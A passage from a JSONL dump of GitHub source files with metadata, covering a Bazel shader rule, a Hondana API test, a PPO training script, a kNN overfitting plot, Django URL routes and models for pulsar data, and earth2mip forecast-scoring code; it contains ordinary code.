generated::shaders',\n ]\n\n ctx.actions.write(\n output = header_out,\n content = '\\n'.join(generated_lines),\n )\n\n compile_ctx = cc_common.create_compilation_context(\n headers=depset([header_out]),\n includes=depset([header_out.dirname])\n )\n\n cc_info = CcInfo(compilation_context=compile_ctx)\n\n return [\n DefaultInfo(files = depset([header_out]), runfiles = ctx.runfiles(files=runtime_files)),\n cc_info\n ]\n\n\nshader_sources = rule(\n implementation = _shaderc_impl,\n attrs = {\n 'common': attr.label_list(allow_files=['.sh']),\n 'shaders': attr.label_list(allow_files=['.sc']),\n 'tooling': attr.label(allow_single_file=True),\n 'bgfx_shader': attr.label(),\n },\n)\n","repo_name":"mosure/bgfx-bazel","sub_path":"tools/shaderc.bzl","file_name":"shaderc.bzl","file_ext":"bzl","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"35317029126","text":"from __future__ import annotations\n\nimport datetime\nimport json\nimport pathlib\nfrom copy import deepcopy\nfrom typing import TYPE_CHECKING, Any\n\nfrom hondana.chapter import Chapter\nfrom hondana.utils import RelationshipResolver, to_snake_case\n\nif TYPE_CHECKING:\n from hondana.http import HTTPClient\n from hondana.types_.chapter import GetSingleChapterResponse\n from hondana.types_.manga import MangaResponse\n from hondana.types_.scanlator_group import ScanlationGroupResponse\n from hondana.types_.user import UserResponse\n\n\nPATH: pathlib.Path = pathlib.Path(__file__).parent / \"payloads\" / \"chapter.json\"\n\nPAYLOAD: GetSingleChapterResponse = json.load(PATH.open())\nHTTP: HTTPClient = object() # type: ignore # this is just for test purposes.\n\n\ndef clone_chapter() -> Chapter:\n t = deepcopy(PAYLOAD)\n assert \"relationships\" in t[\"data\"]\n return Chapter(HTTP, t[\"data\"])\n\n\nclass TestChapter:\n def test_id(self) -> None:\n chapter = clone_chapter()\n assert chapter.id == PAYLOAD[\"data\"][\"id\"]\n\n def test_attributes(self) -> None:\n chapter = clone_chapter()\n for item in PAYLOAD[\"data\"][\"attributes\"]:\n if item == \"publishAt\":\n item = \"publishedAt\" # special cased because it's the only attribute that is future tense, i.e. created_at, updated_at vs publish_at.\n assert hasattr(chapter, to_snake_case(item))\n\n def test_relationship_length(self) -> None:\n chapter = clone_chapter()\n assert chapter.manga is not None\n assert chapter.scanlator_groups is not None\n assert chapter.uploader is not None\n obj_len = len(chapter.scanlator_groups) + 2 # scanlator and manga\n\n assert \"relationships\" in PAYLOAD[\"data\"]\n assert obj_len == len(PAYLOAD[\"data\"][\"relationships\"])\n\n def test_to_dict(self) -> None:\n chapter = clone_chapter()\n ret: dict[str, Any] = chapter.to_dict()\n\n assert bool(ret)\n\n def test_manga_property(self) -> None:\n chapter = clone_chapter()\n\n cloned = deepcopy(PAYLOAD)\n assert \"relationships\" in cloned[\"data\"]\n manga_rel = RelationshipResolver[\"MangaResponse\"](cloned[\"data\"][\"relationships\"], \"manga\").resolve()[0]\n\n assert chapter.manga is not None\n assert manga_rel is not None\n assert chapter.manga.id == manga_rel[\"id\"]\n\n def test_manga_id_property(self) -> None:\n chapter = clone_chapter()\n\n assert chapter.manga is not None\n assert chapter.manga_id == chapter.manga.id\n\n def test_scanlator_groups_property(self) -> None:\n chapter = clone_chapter()\n\n cloned = deepcopy(PAYLOAD)\n assert \"relationships\" in cloned[\"data\"]\n ret = RelationshipResolver[\"ScanlationGroupResponse\"](cloned[\"data\"][\"relationships\"], \"scanlation_group\").resolve()\n\n assert chapter.scanlator_groups is not None\n assert len(ret) == len(chapter.scanlator_groups)\n\n def test_uploader_property(self) -> None:\n chapter = clone_chapter()\n\n assert chapter.uploader is not None\n\n assert \"relationships\" in PAYLOAD[\"data\"]\n uploader_rel = RelationshipResolver[\"UserResponse\"](PAYLOAD[\"data\"][\"relationships\"], \"user\").resolve()[0]\n assert uploader_rel is not None\n\n assert chapter.uploader.id == uploader_rel[\"id\"]\n\n def test_datetime_props(self) -> None:\n chapter = clone_chapter()\n\n assert chapter.created_at == datetime.datetime.fromisoformat(PAYLOAD[\"data\"][\"attributes\"][\"createdAt\"])\n assert chapter.published_at == datetime.datetime.fromisoformat(PAYLOAD[\"data\"][\"attributes\"][\"publishAt\"])\n assert chapter.updated_at == datetime.datetime.fromisoformat(PAYLOAD[\"data\"][\"attributes\"][\"updatedAt\"])\n","repo_name":"AbstractUmbra/Hondana","sub_path":"tests/test_chapter.py","file_name":"test_chapter.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"20"} +{"seq_id":"23102387508","text":"\nfrom PPO import PPO\nfrom common.utils import agg_double_list\n\nimport sys\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nMAX_EPISODES = 5000\nEPISODES_BEFORE_TRAIN = 0\nEVAL_EPISODES = 10\nEVAL_INTERVAL = 100\n\n# roll out n steps\nROLL_OUT_N_STEPS = 10\n# only remember the latest ROLL_OUT_N_STEPS\nMEMORY_CAPACITY = ROLL_OUT_N_STEPS\n# only use the latest ROLL_OUT_N_STEPS for training PPO\nBATCH_SIZE = ROLL_OUT_N_STEPS\n\nTARGET_UPDATE_STEPS = 5\nTARGET_TAU = 1.0\n\nREWARD_DISCOUNTED_GAMMA = 0.99\nENTROPY_REG = 0.00\n#\nDONE_PENALTY = -10.\n\nCRITIC_LOSS = \"mse\"\nMAX_GRAD_NORM = None\n\nEPSILON_START = 0.99\nEPSILON_END = 0.05\nEPSILON_DECAY = 500\n\nRANDOM_SEED = 2017\n\n\ndef run(env_id=\"CartPole-v0\"):\n\n env = gym.make(env_id)\n env.seed(RANDOM_SEED)\n env_eval = gym.make(env_id)\n env_eval.seed(RANDOM_SEED)\n state_dim = env.observation_space.shape[0]\n if len(env.action_space.shape) > 1:\n action_dim = env.action_space.shape[0]\n else:\n action_dim = env.action_space.n\n\n ppo = PPO(env=env, memory_capacity=MEMORY_CAPACITY,\n state_dim=state_dim, action_dim=action_dim,\n batch_size=BATCH_SIZE, entropy_reg=ENTROPY_REG,\n done_penalty=DONE_PENALTY, roll_out_n_steps=ROLL_OUT_N_STEPS,\n target_update_steps=TARGET_UPDATE_STEPS, target_tau=TARGET_TAU,\n reward_gamma=REWARD_DISCOUNTED_GAMMA,\n epsilon_start=EPSILON_START, epsilon_end=EPSILON_END,\n epsilon_decay=EPSILON_DECAY, max_grad_norm=MAX_GRAD_NORM,\n episodes_before_train=EPISODES_BEFORE_TRAIN,\n critic_loss=CRITIC_LOSS)\n\n episodes =[]\n eval_rewards =[]\n while ppo.n_episodes < MAX_EPISODES:\n ppo.interact()\n if ppo.n_episodes >= EPISODES_BEFORE_TRAIN:\n ppo.train()\n if ppo.episode_done and ((ppo.n_episodes+1)%EVAL_INTERVAL == 0):\n rewards, _ = ppo.evaluation(env_eval, EVAL_EPISODES)\n rewards_mu, rewards_std = agg_double_list(rewards)\n print(\"Episode %d, Average Reward %.2f\" % (ppo.n_episodes+1, rewards_mu))\n episodes.append(ppo.n_episodes+1)\n eval_rewards.append(rewards_mu)\n\n episodes = np.array(episodes)\n eval_rewards = np.array(eval_rewards)\n np.savetxt(\"./output/%s_ppo_episodes.txt\"%env_id, episodes)\n np.savetxt(\"./output/%s_ppo_eval_rewards.txt\"%env_id, eval_rewards)\n\n plt.figure()\n plt.plot(episodes, eval_rewards)\n plt.title(\"%s\" % env_id)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Average Reward\")\n plt.legend([\"PPO\"])\n plt.savefig(\"./output/%s_ppo.png\"%env_id)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n run(sys.argv[1])\n else:\n run()\n","repo_name":"ChenglongChen/pytorch-DRL","sub_path":"run_ppo.py","file_name":"run_ppo.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":448,"dataset":"github-code","pt":"20"} +{"seq_id":"32976134724","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Linear regression illustration.\n\nAuthor: Leonard Seydoux\nEmail: leonard.seydoux@univ-grenoble-alpes.fr\nDate: Nov. 2019\n\"\"\"\n\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom sklearn.neighbors import KNeighborsRegressor\n\n# Generate data\nn = 15\nnp.random.seed(1)\nx = np.random.randn(n)\na = .7\nb = -.5\nc = -1\nd = -.5\ny = a * x ** 3 + b * x ** 2 + c * x + d + 1. * np.random.randn(n)\n\n# Put into good shape\nx = x.reshape(-1, 1)\ny = y.reshape(-1, 1)\n\nmodel = KNeighborsRegressor(n_neighbors=1)\nmodel.fit(x, y)\n\n# Show data\nxt = np.linspace(-3, 3).reshape(-1, 1)\nyt = a * xt ** 3 + + b * xt ** 2 + c * xt + d\nfig, ax = plt.subplots(1, figsize=(4, 3))\nax.plot(x, y, '.', label='Data point', mec='k')\nax.plot(xt, yt, '--', label='Ground truth')\nax.plot(xt, model.predict(xt), '-', label='Overfitting model')\nax.set_xlim([-3, 3])\nax.set_ylim([-3, 3])\nax.set_xticks([])\nax.set_yticks([])\nax.set_xlabel(r'Input data ($x$)')\nax.set_ylabel(r'Label ($y$)')\nax.legend()\nfig.savefig('fig_7.png', transparent=True)\n","repo_name":"leonard-seydoux/frontiers_in_earth_sciences","sub_path":"linear_regression/overfitting.py","file_name":"overfitting.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8558149216","text":"from django.urls import path,include, re_path\nfrom . import views\n\nurlpatterns = [\n\n # path('', views.DashboardView.as_view()),\n path('', views.get_board),\n\n ## Project List\n path('list', views.ProjectList.as_view(), name='project_list'),\n path('view/', views.ProjectDetail.as_view(), name='project_view'),\n path('edit/', views.ProjectUpdate.as_view(), name='project_edit'),\n path('delete/', views.ProjectDelete.as_view(), name='project_delete'),\n path('new-project', views.ProjectCreate.as_view(), name='project_new'),\n\n ## Category List\n path('list-categories', views.CategoryList.as_view(), name='category_list'),\n path('new-category', views.CategoryCreate.as_view(), name='category_new'),\n path('edit-category/', views.CategoryUpdate.as_view(), name='category_edit'),\n path('delete-category/', views.CategoryDelete.as_view(), name='category_delete'),\n\n ## Entries\n path('list-entries', views.EntryList.as_view(), name='entry_list'),\n path('new-entry', views.EntryCreate.as_view(), name='entry_new'),\n path('edit-entry/', views.EntryUpdate.as_view(), name='entry_edit'),\n path('delete-entry/', views.EntryDelete.as_view(), name='entry_delete'),\n]","repo_name":"my443/myboard","sub_path":"myboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"9702346098","text":"## import sys\n\n\nn = int(input())\nu = set()\nfor _ in range(n):\n u.add(int(input()))\n\na_b_sum = set()\nfor i in u:\n for j in u:\n a_b_sum.add(i+j)\nans = {}\nfor i in u:\n for j in u:\n if (i-j) in a_b_sum:\n ans[i] = (i,j,i-j)\nkeys = list(ans.keys())\nkeys.sort(reverse = True)\nprint(keys[0])\n","repo_name":"JaehwanO/Codingtest","sub_path":"search/10.17/#2295.py","file_name":"#2295.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"14248739394","text":"import argparse\nimport datetime\nimport logging\nimport os\nimport tempfile\nfrom typing import IO, List\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport xarray as xr\nfrom modulus.distributed.manager import DistributedManager\n\nimport earth2mip.forecast_metrics_io\nfrom earth2mip import _cli_utils, config, initial_conditions, time_loop\nfrom earth2mip.initial_conditions import hdf5\n\n__all__ = [\"score_deterministic\"]\n\n\nclass RMSE:\n output_names = [\"mse\"]\n\n def __init__(self, weight=None):\n self._xy = {}\n self.weight = weight\n\n def _mean(self, x):\n if self.weight is not None:\n x = self.weight * x\n denom = self.weight.mean(-1).mean(-1)\n else:\n denom = 1\n\n num = x.mean(0).mean(-1).mean(-1)\n return num / denom\n\n def call(self, truth, pred):\n xy = self._mean((truth - pred) ** 2)\n return (xy.cpu(),)\n\n def gather(self, seq):\n return torch.sqrt(sum(seq) / len(seq))\n\n\nclass ACC:\n output_names = [\"xx\", \"yy\", \"xy\"]\n\n def __init__(self, mean, weight=None):\n self.mean = mean\n self._xy = {}\n self._xx = {}\n self._yy = {}\n self.weight = weight\n\n def _mean(self, x):\n if self.weight is not None:\n x = self.weight * x\n denom = self.weight.mean(-1).mean(-1)\n else:\n denom = 1\n\n num = x.mean(0).mean(-1).mean(-1)\n return num / denom\n\n def call(self, truth, pred):\n xx = self._mean((truth - self.mean) ** 2).cpu()\n yy = self._mean((pred - self.mean) ** 2).cpu()\n xy = self._mean((pred - self.mean) * (truth - self.mean)).cpu()\n return xx, yy, xy\n\n def gather(self, seq):\n \"\"\"seq is an iterable of (xx, yy, xy) tuples\"\"\"\n # transpose seq\n xx, yy, xy = zip(*seq)\n\n xx = sum(xx)\n xy = sum(xy)\n yy = sum(yy)\n return xy / torch.sqrt(xx) / torch.sqrt(yy)\n\n\nlogging.basicConfig(level=logging.INFO)\n\nlogger = logging.getLogger(\"inference\")\n\n\ndef flat_map(func, seq, *args):\n for x in seq:\n yield from func(x, *args)\n\n\ndef run_forecast(\n model: time_loop.TimeLoop,\n n,\n initial_times,\n device,\n data_source: initial_conditions.base.DataSource,\n mean,\n f: IO[str],\n):\n mean = mean.squeeze()\n assert mean.ndim == 3 # noqa\n\n nlat = len(model.grid.lat)\n channels = [\n data_source.channel_names.index(name) for name in model.out_channel_names\n ]\n mean = mean[channels, :nlat]\n mean = torch.from_numpy(mean).to(device)\n\n lat = np.deg2rad(model.grid.lat)\n assert lat.ndim == 1 # noqa\n weight = np.cos(lat)[:, np.newaxis]\n weight_torch = torch.from_numpy(weight).to(device)\n\n acc = ACC(mean, weight=weight_torch)\n metrics = [acc, RMSE(weight=weight_torch)]\n\n def process(initial_time):\n logger.info(f\"Running {initial_time}\")\n x = initial_conditions.get_initial_condition_for_model(\n time_loop=model, data_source=data_source, time=initial_time\n )\n logger.debug(\"Initial Condition Loaded.\")\n i = -1\n for valid_time, data, _ in model(x=x, time=initial_time):\n assert data.shape[1] == len(model.out_channel_names) # noqa\n i += 1\n if i > n:\n break\n\n lead_time = valid_time - initial_time\n logger.debug(f\"{valid_time}\")\n # TODO make this more performant grabs all history steps unnecessarily\n verification_torch = initial_conditions.get_initial_condition_for_model(\n time_loop=model, data_source=data_source, time=valid_time\n )\n # select first history level\n verification_torch = verification_torch[:, -1]\n for metric in metrics:\n outputs = metric.call(verification_torch, data)\n for name, tensor in zip(metric.output_names, outputs):\n v = tensor.cpu().numpy()\n for c_idx in range(len(model.out_channel_names)):\n earth2mip.forecast_metrics_io.write_metric(\n f,\n initial_time,\n lead_time,\n model.out_channel_names[c_idx],\n name,\n value=v[c_idx],\n )\n\n for initial_time in initial_times:\n process(initial_time)\n\n\ndef score_deterministic(\n model: time_loop.TimeLoop, n: int, initial_times, data_source, time_mean\n) -> xr.Dataset:\n \"\"\"Compute deterministic accs and rmses\n\n Args:\n model: the inference class\n n: the number of lead times\n initial_times: the initial_times to compute over\n data_source: a mapping from time to dataset, used for the initial\n condition and the scoring\n time_mean: a (channel, lat, lon) numpy array containing the time_mean.\n Used for ACC.\n\n Returns:\n metrics: an xarray dataset wtih this structure::\n netcdf dlwp.baseline {\n dimensions:\n lead_time = 57 ;\n channel = 7 ;\n initial_time = 1 ;\n variables:\n int64 lead_time(lead_time) ;\n lead_time:units = \"hours\" ;\n string channel(channel) ;\n double acc(lead_time, channel) ;\n acc:_FillValue = NaN ;\n double rmse(lead_time, channel) ;\n rmse:_FillValue = NaN ;\n int64 initial_times(initial_time) ;\n initial_times:units = \"days since 2018-11-30 12:00:00\" ;\n initial_times:calendar = \"proleptic_gregorian\" ;\n }\n \"\"\"\n if torch.distributed.is_initialized():\n rank = torch.distributed.get_rank()\n world_size = torch.distributed.get_world_size()\n device = f\"cuda:{rank % world_size}\"\n else:\n rank = 0\n world_size = 1\n device = \"cuda:0\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n save_scores(\n model,\n n,\n initial_times,\n data_source,\n time_mean,\n output_directory=tmpdir,\n rank=rank,\n world_size=world_size,\n device=device,\n )\n series = earth2mip.forecast_metrics_io.read_metrics(tmpdir)\n return time_average_metrics(series)\n\n\ndef time_average_metrics(series: pd.Series) -> xr.Dataset:\n \"\"\"Average the metrics across initial time and compute ACC, RMSE\n\n Note, this contrasts from other uses of ACC like weather bench 2.0, since\n the ACC is only formed after the means are taken.\n \"\"\"\n data_array = series.to_xarray()\n dataset = data_array.to_dataset(dim=\"metric\")\n mean = dataset.mean(\"initial_time\")\n out = xr.Dataset()\n out[\"rmse\"] = np.sqrt(mean[\"mse\"])\n out[\"acc\"] = mean[\"xy\"] / np.sqrt(mean[\"xx\"] * mean[\"yy\"])\n out[\"initial_times\"] = dataset[\"initial_time\"]\n return out\n\n\ndef save_scores(\n model: time_loop.TimeLoop,\n n: int,\n initial_times: List[datetime.datetime],\n data_source: initial_conditions.base.DataSource,\n time_mean: np.ndarray,\n output_directory: str,\n rank: int = 0,\n world_size: int = 1,\n device: str = \"cuda\",\n) -> None:\n \"\"\"Compute deterministic skill scores, saving the results the a csv file\n\n Saves the sufficient statistics to compute ACC and RMSE to a csv file for\n each (lead_time, initial_time, channel) tuple.\n\n For ACC these are xx, xy, and yy. So ACC = E[xy] / sqrt(E[xx] * E[yy]).\n\n For RMSE this is MSE. So RMSE=sqrt(E[MSE]).\n\n E is an averaging operator.\n\n Args:\n model: the inference class\n n: the number of lead times\n initial_times: the initial_times to compute over\n data_source: a mapping from time to dataset, used for the initial\n condition and the scoring\n time_mean: a (channel, lat, lon) numpy array containing the time_mean.\n Used for ACC.\n\n Returns:\n metrics\n\n \"\"\"\n local_initial_times = initial_times[rank::world_size]\n os.makedirs(output_directory, exist_ok=True)\n csv_path = os.path.join(output_directory, f\"{rank}.csv\")\n with open(csv_path, \"a\") as f:\n run_forecast(\n model,\n n=n,\n device=device,\n initial_times=local_initial_times,\n data_source=data_source,\n mean=time_mean,\n f=f,\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n _cli_utils.add_model_args(parser, required=True)\n _cli_utils.TimeRange.add_args(parser.add_argument_group(\"Initial Time Selection\"))\n parser.add_argument(\"output\")\n parser.add_argument(\"-n\", type=int, default=4)\n parser.add_argument(\"--test\", action=\"store_true\")\n parser.add_argument(\n \"--shard\",\n type=int,\n default=0,\n help=\"shard index. Often set to SLURM_ARRAY_TASK_ID.\",\n )\n parser.add_argument(\n \"--n-shards\",\n type=int,\n default=1,\n help=\"number of shards. Often set to SLURM_ARRAY_TASK_COUNT.\",\n )\n # TODO refactor this to a shared place\n parser.add_argument(\n \"--data\", type=str, help=\"path to hdf5 root directory containing data.json\"\n )\n\n args = parser.parse_args()\n DistributedManager.initialize()\n dist = DistributedManager()\n initial_times = _cli_utils.TimeRange.from_args(args)\n\n if args.shard >= args.n_shards:\n raise ValueError(\"shard must be less than n-shards\")\n\n if args.test:\n initial_times = initial_times[-dist.world_size :]\n\n model = _cli_utils.model_from_args(args, dist.device)\n\n data_source = hdf5.DataSource.from_path(\n args.data or config.ERA5_HDF5_73, channel_names=model.in_channel_names\n )\n # time mean\n save_scores(\n model,\n n=args.n,\n initial_times=initial_times,\n data_source=data_source,\n time_mean=data_source.time_means,\n output_directory=args.output,\n rank=args.shard * args.n_shards + dist.rank,\n world_size=dist.world_size * args.n_shards,\n device=dist.device,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NVIDIA/earth2mip","sub_path":"earth2mip/inference_medium_range.py","file_name":"inference_medium_range.py","file_ext":"py","file_size_in_byte":10319,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"20"} +{"seq_id":"74253487408","text":"import math\nimport pytz\nfrom datetime import datetime\nfrom dateutil import parser\nfrom django.db import models\nfrom dataportal.models import (\n Foldings,\n Observations,\n Filterbankings,\n Sessions,\n Processings,\n Pipelinefiles,\n)\nfrom django.db.models import JSONField, Q\nfrom statistics import mean\nfrom web_cache.plot_types import PLOT_NAMES\nfrom utils.constants import UserRole\n\nBAND_CHOICES = (\n (\"L-Band\", \"L-Band\"),\n (\"S-Band\", \"S-Band\"),\n (\"UHF\", \"UHF\"),\n (\"UNKNOWN\", \"Unknown\"),\n)\n\nBANDS = {\n \"UHF\": {\"centre_frequency\": 830.0, \"allowed_deviation\": 200.0},\n \"L-Band\": {\"centre_frequency\": 1284.0, \"allowed_deviation\": 200.0},\n \"S-Band\": {\"centre_frequency\": 2625.0, \"allowed_deviation\": 200.0},\n}\n\n\nclass BasePulsar(models.Model):\n \"\"\"\n Abstract class to store common methods and attributes that Searchmode and Foldings share.\n \"\"\"\n\n main_project = models.CharField(max_length=64)\n project = models.CharField(max_length=500)\n all_projects = models.CharField(max_length=500)\n band = models.CharField(choices=BAND_CHOICES, max_length=50)\n jname = models.CharField(max_length=64)\n latest_observation = models.DateTimeField()\n first_observation = models.DateTimeField()\n timespan = models.IntegerField()\n number_of_observations = models.IntegerField()\n beam = models.CharField(max_length=16)\n comment = models.TextField(null=True)\n\n class Meta:\n abstract = True\n unique_together = [[\"main_project\", \"jname\"]]\n ordering = [\"-latest_observation\"]\n\n @classmethod\n def get_query(cls, **kwargs):\n if \"band\" in kwargs:\n if kwargs[\"band\"] == \"All\":\n kwargs.pop(\"band\")\n else:\n kwargs[\"band__icontains\"] = kwargs.pop(\"band\")\n\n if \"project\" in kwargs:\n if kwargs[\"project\"] == \"All\":\n kwargs.pop(\"project\")\n else:\n kwargs[\"project__icontains\"] = kwargs.pop(\"project\")\n\n if \"main_project\" in kwargs and kwargs[\"main_project\"] == \"All\":\n kwargs.pop(\"main_project\")\n\n return cls.objects.filter(**kwargs)\n\n @classmethod\n def get_band(cls, frequency):\n \"\"\"\n Band is the string representation of the frequency used by astronomers.\n\n There are 3 bands that most frequencies should fit into.\n UHF: Ultra High Frequency / 50-cm band, in the range 300 MHZ to 1 GHZ\n L-band: 20-cm band, around Hydrogen transition line ~1.42 GHz\n S-band: 10-cm band, around 2.6 GHz\n \"\"\"\n\n return next(\n (\n band\n for band, frequencies in BANDS.items()\n if abs(float(frequency) - frequencies[\"centre_frequency\"]) < frequencies[\"allowed_deviation\"]\n ),\n \"UNKNOWN\",\n )\n\n @classmethod\n def get_by_session(cls, session):\n return cls.objects.filter(latest_observation__range=(session.start, session.end))\n\n @classmethod\n def most_common_project(cls, observations):\n project_counts = {}\n for observation in observations:\n # If you like it, then you should have put a key on it.\n project_short = observation.project.short\n if project_short in project_counts:\n # I'm a survivor, I'm not a quitter, I'm gonna increment until I'm a winner.\n project_counts[project_short] += 1\n else:\n project_counts[project_short] = 1\n\n # To the left, to the left\n # Find the key with the highest count, to the left\n return max(project_counts, key=project_counts.get)\n\n\nclass SearchmodePulsar(BasePulsar):\n @classmethod\n def update_or_create(cls, target):\n raw_observations = Observations.objects.filter(target=target)\n\n filterbankings = Filterbankings.objects.filter(processing__observation__in=raw_observations).order_by(\n \"-processing__observation__utc_start\"\n )\n\n observation_ids = [f.processing.observation.id for f in filterbankings]\n target_observations = raw_observations.filter(id__in=observation_ids)\n\n latest_observation = target_observations.order_by(\"-utc_start\").first().utc_start\n first_observation = target_observations.order_by(\"-utc_start\").last().utc_start\n timespan = (latest_observation - first_observation).days + 1\n number_of_observations = target_observations.count()\n\n all_projects = \", \".join({observation.project.short for observation in target_observations})\n\n most_common_project = cls.most_common_project(target_observations)\n\n try:\n main_project = latest_observation.project.program.name\n except AttributeError:\n main_project = \"meertime\"\n\n return SearchmodePulsar.objects.update_or_create(\n main_project=main_project,\n jname=target.name,\n defaults={\n \"all_projects\": all_projects,\n \"project\": most_common_project,\n \"latest_observation\": latest_observation,\n \"first_observation\": first_observation,\n \"timespan\": timespan,\n \"number_of_observations\": number_of_observations,\n },\n )\n\n\nclass FoldPulsar(BasePulsar):\n total_integration_hours = models.DecimalField(max_digits=12, decimal_places=1)\n last_sn_raw = models.DecimalField(max_digits=12, decimal_places=1)\n highest_sn_raw = models.DecimalField(max_digits=12, decimal_places=1)\n lowest_sn_raw = models.DecimalField(max_digits=12, decimal_places=1)\n avg_sn_pipe = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n max_sn_pipe = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n last_integration_minutes = models.FloatField(null=True)\n\n @property\n def session(self):\n return Sessions.get_session(self.latest_observation)\n\n @classmethod\n def update_or_create(cls, pulsar, program_name):\n \"\"\"\n Processes data from multiple tables into a single source that can be consumed directly\n by the web application through graphql.\n\n Parameters:\n pulsar: A pulsar model instance.\n program_name: String that represents the program name used for filtering foldings.\n \"\"\"\n\n # Get various related model objects required using the saved folding instance as a base.\n foldings = Foldings.objects.select_related(\"folding_ephemeris\", \"processing\",).filter(\n folding_ephemeris__pulsar=pulsar,\n processing__observation__project__program__name=program_name,\n )\n\n if not foldings:\n return\n\n folding_observations = [folding.processing.observation for folding in foldings]\n latest_folding_observation = foldings.order_by(\"-processing__observation__utc_start\").first()\n\n results = latest_folding_observation.processing.results\n\n # Process data\n latest_observation = (\n foldings.order_by(\"-processing__observation__utc_start\").first().processing.observation.utc_start\n )\n\n first_observation = (\n foldings.order_by(\"-processing__observation__utc_start\").last().processing.observation.utc_start\n )\n\n timespan = (latest_observation - first_observation).days + 1\n number_of_observations = foldings.count()\n total_integration_hours = (\n sum(\n folding.processing.observation.duration\n for folding in foldings\n if folding.processing.observation.duration\n )\n / 60\n / 60\n )\n\n last_sn_raw = results.get(\"snr\", 0)\n last_integration_minutes = latest_folding_observation.processing.observation.duration / 60\n\n all_projects = \", \".join({observation.project.short for observation in folding_observations})\n\n most_common_project = cls.most_common_project(folding_observations)\n\n highest_sn_raw = max(folding.processing.results.get(\"snr\", 1) for folding in foldings)\n lowest_sn_raw = min(folding.processing.results.get(\"snr\", 0) for folding in foldings)\n\n bands = \", \".join(\n {cls.get_band(observation.instrument_config.frequency) for observation in folding_observations}\n )\n\n new_fold_pulsar, created = FoldPulsar.objects.update_or_create(\n main_project=program_name,\n jname=pulsar.jname,\n defaults={\n \"all_projects\": all_projects,\n \"project\": most_common_project,\n \"band\": bands,\n \"latest_observation\": latest_observation,\n \"first_observation\": first_observation,\n \"timespan\": timespan,\n \"number_of_observations\": number_of_observations,\n \"total_integration_hours\": total_integration_hours,\n \"last_sn_raw\": last_sn_raw,\n \"highest_sn_raw\": highest_sn_raw or 0,\n \"lowest_sn_raw\": lowest_sn_raw or 0,\n \"last_integration_minutes\": last_integration_minutes or 0,\n \"avg_sn_pipe\": cls.get_average_snr_over_5min(folding_observations),\n \"max_sn_pipe\": cls.get_max_snr_over_5min(folding_observations),\n \"beam\": latest_folding_observation.processing.observation.instrument_config.beam,\n \"comment\": pulsar.comment,\n },\n )\n\n # Add scrunched data file per project.\n scrunch_files = Pipelinefiles.objects.filter(file__contains=pulsar.jname, file_type__contains=\"FTS\")\n\n for file in scrunch_files:\n FoldPulsarFile.objects.update_or_create(\n fold_pulsar=new_fold_pulsar,\n file_meta=file.file_type,\n file=file.file,\n )\n\n return new_fold_pulsar, created\n\n @classmethod\n def get_snr_results(cls, pulsar_observations):\n observation_results = []\n for observation in pulsar_observations:\n observation_results.extend(\n {\"snr\": process.results[\"snr\"], \"length\": observation.duration}\n for process in observation.processings_set.all()\n if \"snr\" in process.results and \"length\" in process.results\n )\n return observation_results\n\n @classmethod\n def get_average_snr_over_5min(cls, pulsar_observations):\n # SNR is proportional to the sqrt of the observation length.\n # To get the average SNR from a 5 minute block of observations we calculate the observation snr / sqrt And\n observation_results = cls.get_snr_results(pulsar_observations)\n\n if not observation_results:\n return None\n\n sqrt_300 = 17.3205080757\n\n return mean([(o[\"snr\"] / math.sqrt(o[\"length\"]) * sqrt_300) for o in observation_results])\n\n @classmethod\n def get_max_snr_over_5min(cls, pulsar_observations):\n observation_results = cls.get_snr_results(pulsar_observations)\n\n if not observation_results:\n return None\n\n sqrt_300 = 17.3205080757\n\n return max((o[\"snr\"] / math.sqrt(o[\"length\"]) * sqrt_300) for o in observation_results)\n\n\nclass FoldPulsarFile(models.Model):\n fold_pulsar = models.ForeignKey(\"FoldPulsar\", related_name=\"files\", on_delete=models.CASCADE)\n file_meta = models.CharField(max_length=64, null=True)\n file = models.FileField()\n\n @property\n def project(self):\n return self.file_meta.split(\".\")[0]\n\n @property\n def file_type(self):\n return self.file_meta.split(\".\")[2]\n\n @property\n def size(self):\n return self.file.size if self.file.storage.exists(self.file.name) else 0\n\n @property\n def download_link(self):\n return self.file.name\n\n\nclass FoldDetailImage(models.Model):\n fold_pulsar_detail = models.ForeignKey(\"FoldPulsarDetail\", related_name=\"images\", on_delete=models.CASCADE)\n image_type = models.CharField(max_length=64, null=True)\n url = models.URLField()\n\n @property\n def plot_type(self):\n return self.image_type.split(\".\")[-2]\n\n @property\n def generic_plot_type(self):\n return next(\n (key for key, values in PLOT_NAMES.items() if self.plot_type in values),\n self.plot_type,\n )\n\n @property\n def resolution(self):\n # Resolution is either 'hi', 'lo' or size in the form '300x240'\n # We will assume anything with a height lower than 600 is 'lo' res\n try:\n resolution = self.image_type.split(\".\")[-1]\n return \"lo\" if int(resolution.split(\"x\")[0]) < 600 else \"hi\"\n except ValueError:\n return self.image_type.split(\".\")[-1]\n\n @property\n def process(self):\n image_details = self.image_type.split(\".\")\n return image_details[0] if len(image_details) > 2 else \"raw\"\n\n\nclass FoldPulsarDetail(models.Model):\n fold_pulsar = models.ForeignKey(FoldPulsar, on_delete=models.CASCADE)\n utc = 